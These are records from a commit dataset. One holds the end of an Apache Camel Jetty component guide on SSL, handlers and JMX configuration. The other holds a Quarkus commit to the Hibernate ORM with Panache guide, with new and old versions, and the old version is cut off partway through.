`\\https:\/\/` prefix---for example:\n\n[source,xml]\n----\n<from uri=\"jetty:https:\/\/0.0.0.0\/myapp\/myservice\/\"\/>\n----\n\nJetty also needs to know where to load your keystore from and what\npasswords to use in order to load the correct SSL certificate. Set the\nfollowing JVM System Properties:\n\n* `org.eclipse.jetty.ssl.keystore` specifies the location of the Java\nkeystore file, which contains the Jetty server's own X.509 certificate\nin a _key entry_. 
A key entry stores the X.509 certificate (effectively,\nthe _public key_) and also its associated private key.\n* `org.eclipse.jetty.ssl.password` the store password, which is required\nto access the keystore file (this is the same password that is supplied\nto the `keystore` command's `-storepass` option).\n* `org.eclipse.jetty.ssl.keypassword` the key password, which is used to\naccess the certificate's key entry in the keystore (this is the same\npassword that is supplied to the `keystore` command's `-keypass`\noption).\n\nFor details of how to configure SSL on a Jetty endpoint, read the\nfollowing documentation at the Jetty Site:\nhttp:\/\/docs.codehaus.org\/display\/JETTY\/How+to+configure+SSL[http:\/\/docs.codehaus.org\/display\/JETTY\/How+to+configure+SSL]\n\nSome SSL properties aren't exposed directly by Camel, however Camel does\nexpose the underlying SslSocketConnector, which will allow you to set\nproperties like needClientAuth for mutual authentication requiring a\nclient certificate or wantClientAuth for mutual authentication where a\nclient doesn't need a certificate but can have one.\n\n[source,xml]\n----\n<bean id=\"jetty\" class=\"org.apache.camel.component.jetty.JettyHttpComponent\">\n <property name=\"sslSocketConnectors\">\n <map>\n <entry key=\"8043\">\n <bean class=\"org.eclipse.jetty.server.ssl.SslSelectChannelConnector\">\n <property name=\"password\" value=\"...\"\/>\n <property name=\"keyPassword\" value=\"...\"\/>\n <property name=\"keystore\" value=\"...\"\/>\n <property name=\"needClientAuth\" value=\"...\"\/>\n <property name=\"truststore\" value=\"...\"\/>\n <\/bean>\n <\/entry>\n <\/map>\n <\/property>\n<\/bean>\n----\n\nThe value you use as keys in the above map is the port you configure\nJetty to listen on.\n\n=== Configuring general SSL properties\n\nInstead of a per port number specific SSL socket connector (as shown\nabove) you can now configure general properties which applies for all\nSSL socket connectors (which is not explicit configured as above with\nthe port number as entry).\n\n[source,xml]\n----\n<bean id=\"jetty\" class=\"org.apache.camel.component.jetty.JettyHttpComponent\">\n <property name=\"sslSocketConnectorProperties\">\n <map>\n <entry key=\"password\" value=\"...\"\/>\n <entry key=\"keyPassword\" value=\"...\"\/>\n <entry key=\"keystore\" value=\"...\"\/>\n <entry key=\"needClientAuth\" value=\"...\"\/>\n <entry key=\"truststore\" value=\"...\"\/>\n <\/map>\n <\/property>\n<\/bean>\n----\n\n=== How to obtain reference to the X509Certificate\n\nJetty stores a reference to the certificate in the HttpServletRequest\nwhich you can access from code as follows:\n\n[source,java]\n----\nHttpServletRequest req = exchange.getIn().getBody(HttpServletRequest.class);\nX509Certificate cert = (X509Certificate) req.getAttribute(\"javax.servlet.request.X509Certificate\")\n----\n\n=== Configuring general HTTP properties\n\nInstead of a per port number specific HTTP socket connector (as shown\nabove) you can now configure general properties which applies for all\nHTTP socket connectors (which is not explicit configured as above with\nthe port number as entry).\n\n[source,xml]\n----\n<bean id=\"jetty\" class=\"org.apache.camel.component.jetty.JettyHttpComponent\">\n <property name=\"socketConnectorProperties\">\n <map>\n <entry key=\"acceptors\" value=\"4\"\/>\n <entry key=\"maxIdleTime\" value=\"300000\"\/>\n <\/map>\n <\/property>\n<\/bean>\n----\n\n=== Obtaining X-Forwarded-For header with HttpServletRequest.getRemoteAddr()\n\nIf the HTTP requests are 
handled by an Apache server and forwarded to\njetty with mod_proxy, the original client IP address is in the\nX-Forwarded-For header and the HttpServletRequest.getRemoteAddr() will\nreturn the address of the Apache proxy.\n\nJetty has a forwarded property which takes the value from\nX-Forwarded-For and places it in the HttpServletRequest remoteAddr\nproperty. This property is not available directly through the endpoint\nconfiguration but it can be easily added using the socketConnectors\nproperty:\n\n[source,xml]\n----\n<bean id=\"jetty\" class=\"org.apache.camel.component.jetty.JettyHttpComponent\">\n <property name=\"socketConnectors\">\n <map>\n <entry key=\"8080\">\n <bean class=\"org.eclipse.jetty.server.nio.SelectChannelConnector\">\n <property name=\"forwarded\" value=\"true\"\/>\n <\/bean>\n <\/entry>\n <\/map>\n <\/property>\n<\/bean>\n----\n\nThis is particularly useful when an existing Apache server handles TLS\nconnections for a domain and proxies them to application servers\ninternally.\n\n== Default behavior for returning HTTP status codes\n\nThe default behavior of HTTP status codes is defined by the\n`org.apache.camel.component.http.DefaultHttpBinding` class, which\nhandles how a response is written and also sets the HTTP status code.\n\nIf the exchange was processed successfully, the 200 HTTP status code is\nreturned. +\n If the exchange failed with an exception, the 500 HTTP status code is\nreturned, and the stacktrace is returned in the body. If you want to\nspecify which HTTP status code to return, set the code in the\n`Exchange.HTTP_RESPONSE_CODE` header of the OUT message.\n\n== Customizing HttpBinding\n\nBy default, Camel uses the\n`org.apache.camel.component.http.DefaultHttpBinding` to handle how a\nresponse is written. If you like, you can customize this behavior either\nby implementing your own `HttpBinding` class or by extending\n`DefaultHttpBinding` and overriding the appropriate methods.\n\nThe following example shows how to customize the `DefaultHttpBinding` in\norder to change how exceptions are returned:\n\nWe can then create an instance of our binding and register it in the\nSpring registry as follows:\n\n[source,xml]\n----\n<bean id=\"mybinding\" class=\"com.mycompany.MyHttpBinding\"\/>\n----\n\nAnd then we can reference this binding when we define the route:\n\n[source,xml]\n----\n<route>\n <from uri=\"jetty:http:\/\/0.0.0.0:8080\/myapp\/myservice?httpBindingRef=mybinding\"\/>\n <to uri=\"bean:doSomething\"\/>\n<\/route>\n----\n\n== Jetty handlers and security configuration\n\nYou can configure a list of Jetty handlers on the endpoint, which can be\nuseful for enabling advanced Jetty security features. 
These handlers are\nconfigured in Spring XML as follows:\n\n[source,xml]\n----\n<bean id=\"userRealm\" class=\"org.mortbay.jetty.plus.jaas.JAASUserRealm\">\n <property name=\"name\" value=\"tracker-users\"\/>\n <property name=\"loginModuleName\" value=\"ldaploginmodule\"\/>\n<\/bean>\n\n<bean id=\"constraint\" class=\"org.mortbay.jetty.security.Constraint\">\n <property name=\"name\" value=\"BASIC\"\/>\n <property name=\"roles\" value=\"tracker-users\"\/>\n <property name=\"authenticate\" value=\"true\"\/>\n<\/bean>\n\n<bean id=\"constraintMapping\" class=\"org.mortbay.jetty.security.ConstraintMapping\">\n <property name=\"constraint\" ref=\"constraint\"\/>\n <property name=\"pathSpec\" value=\"\/*\"\/>\n<\/bean>\n\n<bean id=\"securityHandler\" class=\"org.mortbay.jetty.security.SecurityHandler\">\n <property name=\"userRealm\" ref=\"userRealm\"\/>\n <property name=\"constraintMappings\" ref=\"constraintMapping\"\/>\n<\/bean>\n----\n\nYou can configure a list of Jetty handlers as follows:\n\n[source,xml]\n----\n<bean id=\"constraint\" class=\"org.eclipse.jetty.http.security.Constraint\">\n <property name=\"name\" value=\"BASIC\"\/>\n <property name=\"roles\" value=\"tracker-users\"\/>\n <property name=\"authenticate\" value=\"true\"\/>\n<\/bean>\n\n<bean id=\"constraintMapping\" class=\"org.eclipse.jetty.security.ConstraintMapping\">\n <property name=\"constraint\" ref=\"constraint\"\/>\n <property name=\"pathSpec\" value=\"\/*\"\/>\n<\/bean>\n\n<bean id=\"securityHandler\" class=\"org.eclipse.jetty.security.ConstraintSecurityHandler\">\n <property name=\"authenticator\">\n <bean class=\"org.eclipse.jetty.security.authentication.BasicAuthenticator\"\/>\n <\/property>\n <property name=\"constraintMappings\">\n <list>\n <ref bean=\"constraintMapping\"\/>\n <\/list>\n <\/property>\n<\/bean>\n----\n\nYou can then define the endpoint as:\n\n[source,java]\n----\nfrom(\"jetty:http:\/\/0.0.0.0:9080\/myservice?handlers=securityHandler\")\n----\n\nIf you need more handlers, set the `handlers` option equal to a\ncomma-separated list of bean IDs.\n\n== How to return a custom HTTP 500 reply message\n\nYou may want to return a custom reply message when something goes wrong,\ninstead of the default reply message Camel xref:jetty-component.adoc[Jetty]\nreplies with. +\n You could use a custom `HttpBinding` to be in control of the message\nmapping, but often it may be easier to use Camel's\nException Clause to construct the custom\nreply message. For example as show here, where we return\n`Dude something went wrong` with HTTP error code 500:\n\n== Multi-part Form support\n\nThe camel-jetty component supports multipart form post out of box.\nThe submitted form-data are mapped into the message header. Camel-jetty\ncreates an attachment for each uploaded file. The file name is mapped to\nthe name of the attachment. The content type is set as the content type\nof the attachment file name. You can find the example here.\n\n== Jetty JMX support\n\nThe camel-jetty component supports the enabling of Jetty's JMX\ncapabilities at the component and endpoint level with the endpoint\nconfiguration taking priority. Note that JMX must be enabled within the\nCamel context in order to enable JMX support in this component as the\ncomponent provides Jetty with a reference to the MBeanServer registered\nwith the Camel context. 
Because the camel-jetty component caches and\nreuses Jetty resources for a given protocol\/host\/port pairing, this\nconfiguration option will only be evaluated during the creation of the\nfirst endpoint to use a protocol\/host\/port pairing. For example, given\ntwo routes created from the following XML fragments, JMX support would\nremain enabled for all endpoints listening on \"https:\/\/0.0.0.0\".\n\n[source,xml]\n----\n<from uri=\"jetty:https:\/\/0.0.0.0\/myapp\/myservice1\/?enableJmx=true\"\/>\n----\n\n[source,xml]\n----\n<from uri=\"jetty:https:\/\/0.0.0.0\/myapp\/myservice2\/?enableJmx=false\"\/>\n----\n\nThe camel-jetty component also provides for direct configuration of the\nJetty MBeanContainer. Jetty creates MBean names dynamically. If you are\nrunning another instance of Jetty outside of the Camel context and\nsharing the same MBeanServer between the instances, you can provide both\ninstances with a reference to the same MBeanContainer in order to avoid\nname collisions when registering Jetty MBeans.\n\ninclude::camel-spring-boot::page$jetty-starter.adoc[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eb866a1ab623c43877f5ac95b0d61eb058eed578","subject":"Fix #2302: Hibernate ORM with Panache guide: mention regular HQL calls","message":"Fix #2302: Hibernate ORM with Panache guide: mention regular HQL calls\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/hibernate-orm-panache-guide.adoc","new_file":"docs\/src\/main\/asciidoc\/hibernate-orm-panache-guide.adoc","new_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/master\/docs\/src\/main\/asciidoc\n\/\/\/\/\n\ninclude::.\/attributes.adoc[]\n= {project-name} - Simplified Hibernate ORM with Panache\n:config-file: application.properties\n\nHibernate ORM is the de facto JPA implementation and offers you the full breadth of an Object Relational Mapper.\nIt makes complex mappings possible, but it does not make simple and common mappings trivial.\nHibernate ORM with Panache focuses on making your entities trivial and fun to write in {project-name}.\n\n== First: an example\n\nWhat we're doing in Panache is allow you to write your Hibernate ORM entities like this:\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntity {\n public String name;\n public LocalDate birth;\n public Status status;\n \n public static Person findByName(String name){\n return find(\"name\", name).firstResult();\n }\n \n public static List<Person> findAlive(){\n return list(\"status\", Status.Alive);\n }\n \n public static void deleteStefs(){\n delete(\"name\", \"Stef\");\n }\n}\n--\n\nYou have noticed how much more compact and readable the code is?\nDoes this look interesting? Read on!\n\nNOTE: the `list()` method might be surprising at first. It takes fragments of HQL (JP-QL) queries and contextualize the rest. 
That makes for very concise but yet readable code.\n\n== Setting up and configuring Hibernate ORM with Panache\n\nTo get started:\n\n* add your settings in `{config-file}`\n* annotate your entities with `@Entity` and make them extend `PanacheEntity`\n* place your entity logic in static methods in your entities\n\nFollow the link:hibernate-orm-guide.html#setting-up-and-configuring-hibernate-orm-without-persistence-xml-recommended[Hibernate set-up guide for all configuration].\n\nIn your `pom.xml`, add the following dependencies:\n\n* the Panache JPA extension\n* your JDBC driver extension (`quarkus-jdbc-postgresql`, `quarkus-jdbc-h2`, `quarkus-jdbc-mariadb`, ...)\n\n[source,xml]\n--\n<dependencies>\n <!-- Hibernate ORM specific dependencies -->\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-hibernate-orm-panache<\/artifactId>\n <\/dependency>\n\n <!-- JDBC driver dependencies -->\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-jdbc-postgresql<\/artifactId>\n <\/dependency>\n<\/dependencies>\n--\n\nThen add the relevant configuration properties in `{config-file}`.\n\n[source,properties]\n--\n# configure your datasource\nquarkus.datasource.url = jdbc:postgresql:\/\/localhost:5432\/mydatabase\nquarkus.datasource.driver = org.postgresql.Driver\nquarkus.datasource.username = sarah\nquarkus.datasource.password = connor\n\n# drop and create the database at startup (use `update` to only update the schema)\nquarkus.hibernate-orm.database.generation = drop-and-create\n--\n\n== Defining your entity\n\nTo define a Panache entity, simply extend `PanacheEntity`, annotate it with `@Entity` and add your\ncolumns as public fields:\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntity {\n public String name;\n public LocalDate birth;\n public Status status;\n}\n--\n\nYou can put all your JPA column annotations on the public fields. If you need a field to not be persisted, use the\n`@Transient` annotation on it. 
If you need to write accessors, you can:\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntity {\n public String name;\n public LocalDate birth;\n public Status status;\n \n \/\/ this will store all names in lowercase in the DB,\n \/\/ and make them uppercase in the model\n public String getName(){\n return name.toUppercase();\n }\n \n public String setName(String name){\n this.name = name.toLowercase();\n }\n}\n--\n\nAnd thanks to our field access rewrite, when your users read `person.name` they will actually call your `getName()` accessor,\nand similarly for field writes and the setter.\nThis allows for proper encapsulation at runtime as all fields calls will be replaced by the corresponding getter\/setter calls.\n\n== Most useful operations\n\nOnce you have written your entity, here are the most common operations you will be able to do:\n\n[source,java]\n--\n\/\/ creating a person\nPerson person = new Person();\nperson.name = \"Stef\";\nperson.birth = LocalDate.of(1910, Month.FEBRUARY, 1);\nperson.status = Status.Alive;\n\n\/\/ persist it\nperson.persist();\n\n\/\/ note that once persisted, you don't need to explicitly save your entity: all\n\/\/ modifications are automatically persisted on transaction commit.\n\n\/\/ check if it's persistent\nif(person.isPersistent()){\n \/\/ delete it\n person.delete();\n} \n\n\/\/ getting a list of all Person entities\nList<Person> allPersons = Person.listAll();\n\n\/\/ finding a specific person by ID\nperson = Person.findById(personId);\n\n\/\/ finding all living persons\nList<Person> livingPersons = Person.list(\"status\", Status.Alive);\n\n\/\/ counting all persons\nlong countAll = Person.count();\n\n\/\/ counting all living persons\nlong countAlive = Person.count(\"status\", Status.Alive);\n\n\/\/ delete all living persons\nPerson.delete(\"status\", Status.Alive);\n\n\/\/ delete all persons\nPerson.deleteAll();\n--\n\nAll `list` methods have equivalent `stream` versions.\n\n[source,java]\n--\nStream<Person> persons = Person.streamAll();\nList<String> namesButEmmanuels = persons\n .map(p -> p.name.toLowerCase() )\n .filter( n -> ! \"emmanuel\".equals(n) )\n .collect(Collectors.toList());\n--\n\n== Paging\n\nYou should only use `list` and `stream` methods if your table contains small enough data sets. 
For larger data\nsets you can use the `find` method equivalents, which return a `PanacheQuery` on which you can do paging:\n\n[source,java]\n--\n\/\/ create a query for all living persons\nPanacheQuery<Person> livingPersons = Person.find(\"status\", Status.Alive);\n\n\/\/ make it use pages of 25 entries at a time\nlivingPersons.page(Page.ofSize(25));\n\n\/\/ get the first page\nList<Person> firstPage = livingPersons.list();\n\n\/\/ get the second page\nList<Person> secondPage = livingPersons.nextPage().list();\n\n\/\/ get page 7\nList<Person> page7 = livingPersons.page(Page.of(7, 25)).list();\n\n\/\/ get the number of pages\nint numberOfPages = livingPersons.pageCount();\n\n\/\/ get the total number of entities returned by this query without paging\nint count = livingPersons.count();\n\n\/\/ and you can chain methods of course\nreturn Person.find(\"status\", Status.Alive)\n .page(Page.ofSize(25))\n .nextPage()\n .stream()\n--\n\nThe `PanacheQuery` type has many other methods to deal with paging and returning streams.\n\n== Sorting\n\nAll methods accepting a query string also accept the following simplified query form:\n\n[source,java]\n--\nList<Person> persons = Person.list(\"order by name,birth\");\n--\n\nBut these methods also accept an optional `Sort` parameter, which allows your to abstract your sorting:\n\n[source,java]\n--\nList<Person> persons = Person.list(Sort.by(\"name\").and(\"birth\"));\n\n\/\/ and with more restrictions\nList<Person> persons = Person.list(\"status\", Sort.by(\"name\").and(\"birth\"), Status.Alive);\n--\n\nThe `Sort` class has plenty of methods for adding columns and specifying sort direction.\n\n== Adding entity methods\n\nIn general, we recommend not adding custom queries for your entities outside of the entities themselves,\nto keep all model queries close to the models they operate on. So we recommend adding them as static methods\nin your entity class:\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntity {\n public String name;\n public LocalDate birth;\n public Status status;\n \n public static Person findByName(String name){\n return find(\"name\", name).firstResult();\n }\n \n public static List<Person> findAlive(){\n return list(\"status\", Status.Alive);\n }\n \n public static void deleteStefs(){\n delete(\"name\", \"Stef\");\n }\n}\n--\n\n== Simplified queries\n\nNormally, HQL queries are of this form: `from EntityName [where ...] 
[order by ...]`, with optional elements\nat the end.\n\nIf your query does not start with `from`, we support the following additional forms:\n\n- `order by ...` which will expand to `from EntityName order by ...`\n- `<singleColumnName>` (and single parameter) which will expand to `from EntityName where <singleColumnName> = ?`\n- `<query>` will expand to `from EntityName where <query>`\n\nNOTE: Naturally, you can also write your queries in plain \nlink:https:\/\/docs.jboss.org\/hibernate\/orm\/5.4\/userguide\/html_single\/Hibernate_User_Guide.html#hql[HQL].\n\n== Query parameters\n\nYou can pass query parameters by index (1-based):\n\n[source,java]\n--\nPerson.find(\"name = ?1 and status = ?2\", \"stef\", Status.Alive);\n--\n\nOr by name using a `Map`:\n\n[source,java]\n--\nMap<String, Object> params = new HashMap<>();\nparams.put(\"name\", \"stef\");\nparams.put(\"status\", Status.Alive);\nPerson.find(\"name = :name and status = :status\", params);\n--\n\nOr using the convenience class `Parameters` to either build a `Map` or just use as-is:\n\n[source,java]\n--\n\/\/ generate a Map\nPerson.find(\"name = :name and status = :status\", \n Parameters.with(\"name\", \"stef\").and(\"status\", Status.Alive).map());\n\n\/\/ use it as-is\nPerson.find(\"name = :name and status = :status\", \n Parameters.with(\"name\", \"stef\").and(\"status\", Status.Alive));\n--\n\nEvery query operation accepts passing parameters by index (`Object...`), or by name (`Map<String,Object>` or `Parameters`).\n\n== The DAO\/Repository option\n\nLook, we get it: you have a love\/hate relationship with DAOs\/Repositories but you can't live without them. We don't judge, we\nknow life is tough and we've got you covered.\n\nIf you want to have Repositories, you can get the exact same convenient methods injected in your Repository by making it\nimplement `PanacheRepository`:\n\n[source,java]\n--\n@ApplicationScoped\npublic class PersonRepository implements PanacheRepository<Person> {\n\n \/\/ put your custom logic here as instance methods\n \n public Person findByName(String name){\n return find(\"name\", name).firstResult();\n }\n \n public List<Person> findAlive(){\n return list(\"status\", Status.Alive);\n }\n \n public void deleteStefs(){\n delete(\"name\", \"Stef\");\n }\n}\n--\n\nAbsolutely all the operations that are defined on `PanacheEntityBase` are available on your DAO, so using it\nis exactly the same except you need to inject it:\n\n[source,java]\n--\n@Inject\nPersonRepository personRepository;\n\n@GET\npublic long count(){\n return personRepository.count();\n}\n--\n\nSo if Repositories are your thing, you can keep doing them. Even with repositories, you can keep your entities as\nsubclasses of `PanacheEntity` in order to get the ID and public fields working, but you can even skip that and\ngo back to specifying your ID and using getters and setters if that's your thing. We're not judging.\n\n== Transactions\n\nIn Quarkus, every method that modifies the database must be run in a transaction. If you try to modify the database \noutside a transaction you will get an exception. It is not required for querying operations.\n\nYou can annotate any method with `@Transactional` in order to get a transaction. 
We recommend doing so in your\nREST endpoints where you manipulate entities.\n\n\n== Custom IDs\n\nIDs are often a touchy subject, and not everyone's up for letting them handled by the framework, once again we\nhave you covered.\n\nYou can specify your own ID strategy by extending `PanacheEntityBase` instead of `PanacheEntity`. Then\nyou just declare whatever ID you want as a public field:\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntityBase {\n\n @Id\n @SequenceGenerator(\n name = \"personSequence\",\n sequenceName = \"person_id_seq\",\n allocationSize = 1,\n initialValue = 4)\n @GeneratedValue(strategy = GenerationType.SEQUENCE, generator = \"personSequence\")\n public Integer id;\n\n ...\n}\n--\n\nIf you're using repositories, then you will want to extend `PanacheRepositoryBase` instead of `PanacheRepository`\nand specify your ID type as an extra type parameter:\n\n[source,java]\n--\n@ApplicationScoped\npublic class PersonRepository implements PanacheRepositoryBase<Person,Integer> {\n\n ...\n}\n--\n\n== How and why we simplify Hibernate ORM mappings\n\nWhen it comes to writing Hibernate ORM entities, there are a number of annoying things that users have grown used to \nreluctantly deal with, such as:\n\n- Duplicating ID logic: most entities need an ID, most people don't care how it's set, because it's not really\nrelevant to your model.\n- Dumb getters and setters: since Java lacks support for properties in the language, we have to create fields,\nthen generate getters and setters for those fields, even if they don't actually do anything more than read\/write\nthe fields.\n- Traditional EE patterns advise to split entity definition (the model) from the operations you can do on them\n(DAOs, Repositories), but really that requires an unnatural split between the state and its operations even though\nwe would never do something like that for regular objects in the Object Oriented architecture, where state and methods\nare in the same class. Moreover, this requires two classes per entity, and requires injection of the DAO or Repository\nwhere you need to do entity operations, which breaks your edit flow and requires you to get out of the code you're\nwriting to set up an injection point before coming back to use it.\n- Hibernate queries are super powerful, but overly verbose for common operations, requiring you to write queries even\nwhen you don't need all the parts.\n- Hibernate is very general-purpose, but does not make it trivial to do trivial operations that make up 90% of our\nmodel usage.\n\nWith Panache, we took an opinionated approach to tackle all these problems:\n\n- Make your entities extend `PanacheEntity`: it has an ID field that is auto-generated. If you require\na custom ID strategy, you can extend `PanacheEntityBase` instead and handle the ID yourself.\n- Use public fields. Get rid of dumb getter and setters. Under the hood, we will generate all getters and setters\nthat are missing, and rewrite every access to these fields to use the accessor methods. This way you can still\nwrite _useful_ accessors when you need them, which will be used even though your entity users still use field accesses.\n- Don't use DAOs or Repositories: put all your entity logic in static methods in your entity class. Your entity superclass\ncomes with lots of super useful static methods and you can add your own in your entity class. 
Users can just start using\nyour entity `Person` by typing `Person.` and getting completion for all the operations in a single place.\n- Don't write parts of the query that you don't need: write `Person.find(\"order by name\")` or\n`Person.find(\"name = ?1 and status = ?2\", \"stef\", Status.Alive)` or even better\n`Person.find(\"name\", \"stef\")`.\n\nThat's all there is to it: with Panache, Hibernate ORM has never looked so trim and neat. \n\n== Defining entities in external projects or jars\n\nHibernate ORM with Panache in Quarkus relies on compile-time bytecode enhancements to your entities. If you define your entities in the\nsame project where you build your Quarkus application, everything will work fine. If the entities come from external projects\nor jars, you should build those jars with the Jandex Maven plugin, so that your entities will be indexed and found by Quarkus\nand enhanced:\n\n[source,xml]\n--\n<plugin>\n <groupId>org.jboss.jandex<\/groupId>\n <artifactId>jandex-maven-plugin<\/artifactId>\n <version>1.0.3<\/version>\n <executions>\n <execution>\n <id>make-index<\/id>\n <goals>\n <goal>jandex<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <dependencies>\n <dependency>\n <groupId>org.jboss<\/groupId>\n <artifactId>jandex<\/artifactId>\n <version>2.1.1.Final<\/version>\n <\/dependency>\n <\/dependencies>\n<\/plugin>\n--\n","old_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/master\/docs\/src\/main\/asciidoc\n\/\/\/\/\n\ninclude::.\/attributes.adoc[]\n= {project-name} - Simplified Hibernate ORM with Panache\n:config-file: application.properties\n\nHibernate ORM is the de facto JPA implementation and offers you the full breadth of an Object Relational Mapper.\nIt makes complex mappings possible, but it does not make simple and common mappings trivial.\nHibernate ORM with Panache focuses on making your entities trivial and fun to write in {project-name}.\n\n== First: an example\n\nWhat we're doing in Panache is allowing you to write your Hibernate ORM entities like this:\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntity {\n public String name;\n public LocalDate birth;\n public Status status;\n \n public static Person findByName(String name){\n return find(\"name\", name).firstResult();\n }\n \n public static List<Person> findAlive(){\n return list(\"status\", Status.Alive);\n }\n \n public static void deleteStefs(){\n delete(\"name\", \"Stef\");\n }\n}\n--\n\nHave you noticed how much more compact and readable the code is?\nDoes this look interesting? Read on!\n\nNOTE: the `list()` method might be surprising at first. It takes fragments of HQL (JP-QL) queries and contextualizes the rest. 
That makes for very concise yet readable code.\n\n== Setting up and configuring Hibernate ORM with Panache\n\nTo get started:\n\n* add your settings in `{config-file}`\n* annotate your entities with `@Entity` and make them extend `PanacheEntity`\n* place your entity logic in static methods in your entities\n\nFollow the link:hibernate-orm-guide.html#setting-up-and-configuring-hibernate-orm-without-persistence-xml-recommended[Hibernate set-up guide for all configuration].\n\nIn your `pom.xml`, add the following dependencies:\n\n* the Panache JPA extension\n* your JDBC driver extension (`quarkus-jdbc-postgresql`, `quarkus-jdbc-h2`, `quarkus-jdbc-mariadb`, ...)\n\n[source,xml]\n--\n<dependencies>\n <!-- Hibernate ORM specific dependencies -->\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-hibernate-orm-panache<\/artifactId>\n <\/dependency>\n\n <!-- JDBC driver dependencies -->\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-jdbc-postgresql<\/artifactId>\n <\/dependency>\n<\/dependencies>\n--\n\nThen add the relevant configuration properties in `{config-file}`.\n\n[source,properties]\n--\n# configure your datasource\nquarkus.datasource.url = jdbc:postgresql:\/\/localhost:5432\/mydatabase\nquarkus.datasource.driver = org.postgresql.Driver\nquarkus.datasource.username = sarah\nquarkus.datasource.password = connor\n\n# drop and create the database at startup (use `update` to only update the schema)\nquarkus.hibernate-orm.database.generation = drop-and-create\n--\n\n== Defining your entity\n\nTo define a Panache entity, simply extend `PanacheEntity`, annotate it with `@Entity` and add your\ncolumns as public fields:\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntity {\n public String name;\n public LocalDate birth;\n public Status status;\n}\n--\n\nYou can put all your JPA column annotations on the public fields. If you need a field to not be persisted, use the\n`@Transient` annotation on it. 
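For example (a minimal sketch; the `nickname` field is purely illustrative):\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntity {\n public String name;\n\n \/\/ this field is ignored by Hibernate ORM and not stored in the database\n @Transient\n public String nickname;\n}\n--\n\n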
If you need to write accessors, you can:\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntity {\n public String name;\n public LocalDate birth;\n public Status status;\n \n \/\/ this will store all names in lowercase in the DB,\n \/\/ and make them uppercase in the model\n public String getName(){\n return name.toUpperCase();\n }\n \n public void setName(String name){\n this.name = name.toLowerCase();\n }\n}\n--\n\nAnd thanks to our field access rewrite, when your users read `person.name` they will actually call your `getName()` accessor,\nand similarly for field writes and the setter.\nThis allows for proper encapsulation at runtime as all field calls will be replaced by the corresponding getter\/setter calls.\n\n== Most useful operations\n\nOnce you have written your entity, here are the most common operations you will be able to do:\n\n[source,java]\n--\n\/\/ creating a person\nPerson person = new Person();\nperson.name = \"Stef\";\nperson.birth = LocalDate.of(1910, Month.FEBRUARY, 1);\nperson.status = Status.Alive;\n\n\/\/ persist it\nperson.persist();\n\n\/\/ note that once persisted, you don't need to explicitly save your entity: all\n\/\/ modifications are automatically persisted on transaction commit.\n\n\/\/ check if it's persistent\nif(person.isPersistent()){\n \/\/ delete it\n person.delete();\n} \n\n\/\/ getting a list of all Person entities\nList<Person> allPersons = Person.listAll();\n\n\/\/ finding a specific person by ID\nperson = Person.findById(personId);\n\n\/\/ finding all living persons\nList<Person> livingPersons = Person.list(\"status\", Status.Alive);\n\n\/\/ counting all persons\nlong countAll = Person.count();\n\n\/\/ counting all living persons\nlong countAlive = Person.count(\"status\", Status.Alive);\n\n\/\/ delete all living persons\nPerson.delete(\"status\", Status.Alive);\n\n\/\/ delete all persons\nPerson.deleteAll();\n--\n\nAll `list` methods have equivalent `stream` versions.\n\n[source,java]\n--\nStream<Person> persons = Person.streamAll();\nList<String> namesButEmmanuels = persons\n .map(p -> p.name.toLowerCase() )\n .filter( n -> ! \"emmanuel\".equals(n) )\n .collect(Collectors.toList());\n--\n\n== Paging\n\nYou should only use `list` and `stream` methods if your table contains small enough data sets. 
For larger data\nsets you can use the `find` method equivalents, which return a `PanacheQuery` on which you can do paging:\n\n[source,java]\n--\n\/\/ create a query for all living persons\nPanacheQuery<Person> livingPersons = Person.find(\"status\", Status.Alive);\n\n\/\/ make it use pages of 25 entries at a time\nlivingPersons.page(Page.ofSize(25));\n\n\/\/ get the first page\nList<Person> firstPage = livingPersons.list();\n\n\/\/ get the second page\nList<Person> secondPage = livingPersons.nextPage().list();\n\n\/\/ get page 7\nList<Person> page7 = livingPersons.page(Page.of(7, 25)).list();\n\n\/\/ get the number of pages\nint numberOfPages = livingPersons.pageCount();\n\n\/\/ get the total number of entities returned by this query without paging\nlong count = livingPersons.count();\n\n\/\/ and you can chain methods of course\nreturn Person.find(\"status\", Status.Alive)\n .page(Page.ofSize(25))\n .nextPage()\n .stream();\n--\n\nThe `PanacheQuery` type has many other methods to deal with paging and returning streams.\n\n== Sorting\n\nAll methods accepting a query string also accept the following simplified query form:\n\n[source,java]\n--\nList<Person> persons = Person.list(\"order by name,birth\");\n--\n\nBut these methods also accept an optional `Sort` parameter, which allows you to abstract your sorting:\n\n[source,java]\n--\nList<Person> persons = Person.list(Sort.by(\"name\").and(\"birth\"));\n\n\/\/ and with more restrictions\nList<Person> persons = Person.list(\"status\", Sort.by(\"name\").and(\"birth\"), Status.Alive);\n--\n\nThe `Sort` class has plenty of methods for adding columns and specifying sort direction.\n\n== Adding entity methods\n\nIn general, we recommend not adding custom queries for your entities outside of the entities themselves,\nto keep all model queries close to the models they operate on. So we recommend adding them as static methods\nin your entity class:\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntity {\n public String name;\n public LocalDate birth;\n public Status status;\n \n public static Person findByName(String name){\n return find(\"name\", name).firstResult();\n }\n \n public static List<Person> 